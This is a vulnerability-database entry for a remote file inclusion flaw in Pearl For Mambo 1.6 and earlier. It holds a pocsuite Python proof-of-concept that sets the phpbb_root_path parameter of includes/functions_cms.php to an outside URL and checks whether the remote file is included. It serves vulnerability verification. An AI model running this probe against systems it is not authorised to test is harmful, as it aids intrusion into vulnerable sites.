Pearl For Mambo <= 1.6 - Multiple Remote File Include Vulnerabilities

2014-07-01T00:00:00
ID SSV:63674
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = '63674'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-07-03'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-63674']
    name = 'Pearl For Mambo <= 1.6 - Multiple Remote File Include Vulnerabilities'
    appPowerLink = ''
    appName = 'Pearl For Mambo'
    appVersion = '<= 1.6'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/includes/functions_cms.php?phpbb_root_path=http://baidu.com/robots.txt' % self.url
        response = req.get(vul_url).content

        if 'Baiduspider' in response and 'Googlebot' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(TestPOC)